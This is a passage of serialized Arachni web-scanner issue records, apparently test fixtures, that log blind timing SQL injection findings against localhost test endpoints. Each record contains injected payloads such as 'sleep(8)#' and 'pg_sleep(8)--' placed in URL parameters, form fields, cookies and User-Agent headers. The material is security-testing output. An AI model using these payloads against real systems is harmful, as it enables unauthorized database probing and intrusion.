      :follow_location: true
      :injected: sleep(8)#
      :combo: 
        input: sleep(8)#
      :action: http://localhost:7499/mysql/link/straight?input=default
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mysql/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mysql/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: defaultsleep(8)#
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: sleep(__TIME__)#
      :skip_orig: true
      :injected_orig: sleep(8)#
      :altered: input
      :element: link
      :params: 
        input: defaultsleep(8)#
      :follow_location: true
      :injected: defaultsleep(8)#
      :combo: 
        input: defaultsleep(8)#
      :action: http://localhost:7499/mysql/link/append?input=default
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mysql/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mysql/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=sleep(8)#;cookie2=cookie+value
      response: {}

    id: 
    injected: sleep(8)#
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: sleep(__TIME__)#
      :skip_orig: true
      :injected_orig: sleep(8)#
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: sleep(8)#
      :injected: sleep(8)#
      :combo: 
        cookie: sleep(8)#
      :action: http://localhost:7499/mysql/cookie/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mysql/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mysql/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+valuesleep(8)#
      response: {}

    id: 
    injected: cookie valuesleep(8)#
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: sleep(__TIME__)#
      :skip_orig: true
      :injected_orig: sleep(8)#
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie valuesleep(8)#
      :injected: cookie valuesleep(8)#
      :combo: 
        cookie2: cookie valuesleep(8)#
      :action: http://localhost:7499/mysql/cookie/append
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mysql/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mysql/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: sleep(8)#
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: sleep(8)#
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: sleep(__TIME__)#
      :skip_orig: true
      :injected_orig: sleep(8)#
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: sleep(8)#
      :injected: sleep(8)#
      :combo: 
        User-Agent: sleep(8)#
      :action: http://localhost:7499/mysql/header/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mysql/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/mysql/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_usersleep(8)#
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: arachni_usersleep(8)#
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: sleep(__TIME__)#
      :skip_orig: true
      :injected_orig: sleep(8)#
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_usersleep(8)#
      :injected: arachni_usersleep(8)#
      :combo: 
        User-Agent: arachni_usersleep(8)#
      :action: http://localhost:7499/mysql/header/append
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/mysql/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: POST
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/postgresql/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: pg_sleep(8)--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: POST
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: pg_sleep(__TIME__)--
      :skip_orig: true
      :injected_orig: pg_sleep(8)--
      :altered: input
      :element: form
      :params: 
        input: pg_sleep(8)--
      :follow_location: true
      :injected: pg_sleep(8)--
      :combo: 
        input: pg_sleep(8)--
      :action: http://localhost:7499/postgresql/form/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/postgresql/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: POST
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/postgresql/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: defaultpg_sleep(8)--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: POST
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: pg_sleep(__TIME__)--
      :skip_orig: true
      :injected_orig: pg_sleep(8)--
      :altered: input
      :element: form
      :params: 
        input: defaultpg_sleep(8)--
      :follow_location: true
      :injected: defaultpg_sleep(8)--
      :combo: 
        input: defaultpg_sleep(8)--
      :action: http://localhost:7499/postgresql/form/append
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/postgresql/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/postgresql/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: pg_sleep(8)--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: pg_sleep(__TIME__)--
      :skip_orig: true
      :injected_orig: pg_sleep(8)--
      :altered: input
      :element: link
      :params: 
        input: pg_sleep(8)--
      :follow_location: true
      :injected: pg_sleep(8)--
      :combo: 
        input: pg_sleep(8)--
      :action: http://localhost:7499/postgresql/link/straight?input=default
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/postgresql/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/postgresql/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: {}

    id: 
    injected: defaultpg_sleep(8)--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: pg_sleep(__TIME__)--
      :skip_orig: true
      :injected_orig: pg_sleep(8)--
      :altered: input
      :element: link
      :params: 
        input: defaultpg_sleep(8)--
      :follow_location: true
      :injected: defaultpg_sleep(8)--
      :combo: 
        input: defaultpg_sleep(8)--
      :action: http://localhost:7499/postgresql/link/append?input=default
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/postgresql/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - timing
  - injection
  - database
  url: http://localhost:7499/postgresql/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=pg_sleep(8)--;cookie2=cookie+value
      response: {}

    id: 
    injected: pg_sleep(8)--
    internal_modname: BlindTimingSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (timing) SQL injection
    name: Blind SQL Injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :timeout: 5600.0
      :timeout_divider: 1000
      :timing_string: pg_sleep(__TIME__)--
      :skip_orig: true
      :injected_orig: pg_sleep(8)--
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: pg_sleep(8)--
      :injected: pg_sleep(8)--
      :combo: 
        cookie: pg_sleep(8)--
      :action: http://localhost:7499/postgresql/cookie/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: ""
    severity: High
    tags: 
    - sql
    - blind
    - timing
    - injection
    - database
    url: http://localhost:7499/postgresql/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: BlindTimingSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (timing) SQL injection
  name: Blind SQL Injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
